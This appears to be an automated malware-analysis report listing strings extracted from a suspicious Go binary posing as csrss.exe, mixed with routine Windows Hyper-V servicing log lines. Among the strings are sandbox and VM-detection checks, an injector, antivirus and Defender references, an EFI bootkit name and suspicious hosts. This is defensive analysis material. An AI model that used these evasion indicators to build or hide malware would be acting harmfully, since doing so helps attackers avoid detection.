Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 350d2f419bdddcb6a98b096b17a5e4ec, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Hypervisor, new state: Off
Source: csrss.exe Binary or memory string: too many linkstoo many usersunexpected EOFunknown code: unknown error unknown markerunknown methodunknown mode: unreachable: unsafe.Pointervirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #work.full != 0x509ignoreCN=1xenservice.exezero par
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe Binary or memory string: ionPalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:][:alpha:][:asc
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 54471d62ed5a517374d13bdd02cd715e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:54, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: b53b41e2e1c4409bda9e9a54b7b3b422, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 878b2f9862ce158a90aa7b5c871b772e because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 9778903714986ba7c2a01fb00bd42436, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1007f7901cdcdcd84e1638c6732a7565, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 101afe1e2ee3fa31a2c2b78c5d9a5aaf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Hypervisor, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:42, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V, Intended State: Staged
Source: upd.exe.0.dr Binary or memory string: dvdyvmci
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm.webp156253.2.2500015000250003500045000550006560015600278125:***@:path<nil>AdlamAprilAttr(BamumBatakBuhidCall CountDograECDSAErrorFlagsFoundGetDCGreekHTTP/KhmerLatinLimbuLocalLstatMarchNushuOghamOriyaOsageP-224P-256P-384P-521PGDSERangeRealmRunicSTermTakriTamilTypeAUUID=\u202allowarraybad nblackbrookchdirclosecloudcsrssdreamemptyfalsefaultfieldfloatfrostgcinggladegrassgreenhttpsimap2imap3imapsint16int32int64matchmistymkdirmonthmuddynightntohspanicpaperparsepgdsepop3sproudquietrangeriverrmdirroughrouterune sdsetshapesleepslicesmallsmokesnowysockssoundsse41sse42ssse3stilltext/tls13tls: totaluint8usageuser=utf-8valuevmusbvmx86voicewaterwhitewispywriteyoung (MB)
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Online-Services-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Management-Clients, Intended State: Staged
Source: csrss.exe Binary or memory string: main.isRunningInsideVMWare
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: entersyscallexit status found av: %sgcpacertracegetaddrinfowgot TI tokenguid_machinehost is downhttp2debug=1http2debug=2illegal seekinjector.exeinstall_dateinvalid baseinvalid portinvalid slotiphlpapi.dllkernel32.dllmachine_guidmadvdontneedmax-forwardsnetapi32.dllno such hostnon-existentnot pollableoleaut32.dllout of rangeparse PE: %wpointtopointproxyconnectreflect.Copyreleasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficshort buffersignature.%stransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog.exewinlogon.exewintrust.dllwirep: p->m=wtsapi32.dll != sweepgen (default %q) (default %v) MB released
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 268bf92397d59ed4327a8ab865bfc689, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: csrss.exe Binary or memory string: uetypeudp6uintunixuuidvaryvmciwavewildwindwoodxn-- -%s ... H_T= H_a= H_g= MB, W_a= and h_a= h_g= h_t= max= ptr siz= tab= top= u_a= u_g=%s %q%s*%d%s/%s%s:%d%s=%s%v-%v&#34;&#39;&amp;+0330+0430+0530+0545+0630+0845+1030+1245+1345, ..., fp:-0930.html.jpeg.wasm
Source: csrss.exe Binary or memory string: tUsage of %s: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: HyperV-Networking-Containers-Package, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:57:09, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7a9c36033f0c22829893bc1c0a5e07a8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Local Parent: Microsoft-Hyper-V-Tools-All, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: fc0d60ecae9730160d4af9bb0ca3213e, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: detect Parent, Package: Microsoft-Windows-RemoteFX-Graphics-Virtualization-Host-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Parent: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Disposition = Detect, VersionComp: EQ, BuildComp: EQ, RevisionComp: EQ, Exist: present
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 1505902669a359dad80a977529ca66cd, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8381c0f3cdb917a83d773f922f3b5250 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 7af75ecf5d4e3ae499f64704cca67740, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c2f20508edf3c1fbda6e99ff59eb02d8, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: l}main.isRunningInsideVMWare
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, new state: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 976eb15fe43109e4df4c51c7509e8caf, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 8c028159d1d14a93f99d8c89b6f63e99 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Core-Group-servercommon-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: HyperV-Primitive-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Common-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Onecore-SPP-VirtualDevice, Applicable: NeedsParent, Disposition: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: DSA-SHA1DecemberDefenderDeleteDCDuployanEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneJavaneseKatakanaKayah_LiLinear_ALinear_BLocationLsaCloseMahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUgariticVBoxWddmVT_ARRAYVT_BYREFWSAIoctlWinmonFS[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnumacceptexaddress bad instcgocheckcs darknessdefault:delicatednsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp exporterfinishedfragrantfs go1.13.3gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid locationloopbackmac_addrmountainmountvolmsvmmoufnamelessno anodeno-cacheno_proxyopPseudopolishedraw-readreadfromrecvfromrestlessrunnableruntime.scavengeshutdownsolitarystrconv.taskkilltwilightunixgramunknown(usernamevmmemctlvmx_svgawitheredwsaioctlwuauservyuio.top (forced) blocked= defersc= in use)
Source: csrss.exe Binary or memory string: ridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLockedLycianLydianMondayPADDEDPcaSvcPragmaProgidRejangSCHED STREETServerStringSundaySyriacTai_LeTangutTeluguThaanaTypeMXTypeNSUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11VBoxSFVT(%d)WINDIRWinMonWin
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: upd.exe.0.dr Binary or memory string: VMSrvc
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Installed, pending: Default, start: Installed, applicable: Installed, targeted: Installed, limit: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 0b74307a9b8d5a99fef4ac35da0bd75f, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: Value is nullVirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptyemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflatehttp2client=0if-none-matchimage/svg+xmlinvalid UTF-8invalid base kernel32.dllkey expansionlast-modifiedlevel 3 resetload64 failedlogs endpointmaster secretname is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparse URL: %wparsing time powrprof.dllprl_tools.exerebooting nowscvg: inuse: servers countservice statesigner is nilsmb start: %wsocks connectsrmount errorstill in listtimer expiredtrailing datatriggerRatio=unimplementedunsupported: user canceledvalue method verifier hashverifier hostvirtualpc: %wxadd64 failedxchg64 failed}
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Online-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: is unavailable()<>@,;:\"/[]?=0601021504Z0700476837158203125: cannot parse :ValidateLabels; SameSite=None<invalid Value>ASCII_Hex_DigitAccept-EncodingAccept-LanguageAddDllDirectoryBelowExactAboveCLSIDFromProgIDCLSIDFromStringCreateHardLinkWCreateWindowExWDefaultInstanceDelegateExecuteDeviceIoControlDuplicateHandleEfiGuardDxe.efiElectrumX 1.2.1Failed to find Failed to load FindNextVolumeWFindVolumeCloseFlushViewOfFileGateway TimeoutGetActiveObjectGetAdaptersInfoGetCommTimeoutsGetCommandLineWGetFirmwareTypeGetProcessTimesGetSecurityInfoGetStartupInfoWGlobal\qtxp9g8wHanifi_RohingyaIdempotency-KeyImpersonateSelfInstall failureIsWow64Process2Length RequiredLoadLibraryExALoadLibraryExWNonTransitionalNot ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePartial ContentProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-All, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 3e4a15565a769f217408d9c4b1007394, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: DetectUpdate, Package: Microsoft-Windows-PAW-Feature-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Remote Parent: Microsoft-Hyper-V-Services, Intended State: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 4584754bbb113844563ccba331941b2b because it is already in the correct state.
Source: 0NlSa5bf55.exe, 00000000.00000002.310849116.0000000000401000.00000040.00020000.sdmp Binary or memory string: vmnet/http.(*http2clientConnPool).addConnLocked
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: c299ced9de977b3f430798798b7f4515, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients-63, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Evaluating package applicability for package Microsoft-Hyper-V-Offline-Common-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, applicable state: Installed
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Services, current: Staged, pending: Default, start: Staged, applicable: Staged, targeted: Staged, limit: Installed, selected: Off
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Management-Clients, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Appl: Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, Applicable: NeedsParent, Disposition: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: Microsoft-Hyper-V-Services-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 459e5e70c44eb8fcb9d7b4b143aad831, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged, selected: Default
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Merge into existing execution package for Package: Microsoft-Hyper-V-Hypervisor-Package~31bf3856ad364e35~amd64~~10.0.17134.1, existing TargetedState: Staged, new TargetedState: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: Microsoft-Hyper-V-Package-base-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 71529a01421a29d3f726bde298b145c0 because it is already in the correct state.
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Offline-Core-Group-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: csrss.exe, 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp Binary or memory string: throbbingunderflowunhandledw3m/0.5.1wanderingwaterfallweatheredwebsocketxenevtchn} stack=[ MB goal, actual
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:57, Info CBS Update: Setting Install State, Package: Microsoft-Hyper-V-ClientEdition-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: Microsoft-Hyper-V-Tools-All, current State: Default, new state: Off, RemovePayload: 0
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:55:58, Info CBS Plan: Package: HyperV-Compute-System-VirtualMachine-onecore-Package~31bf3856ad364e35~amd64~~10.0.17134.1, current: Staged, pending: Default, start: Staged, applicable: Installed, targeted: Staged, limit: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Package: Microsoft-Hyper-V-Package-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1 is already in the correct state, current: Staged, targeted: Staged
Source: CBS.log.7.dr Binary or memory string: 2019-06-27 00:56:56, Info CBS Exec: Skipping Package: HyperV-Compute-System-VirtualMachine-vm-Package~31bf3856ad364e35~amd64~~10.0.17134.1, Update: 2679350ec0edae52ee03c1daaf55d8c2 because it is already in the correct state.
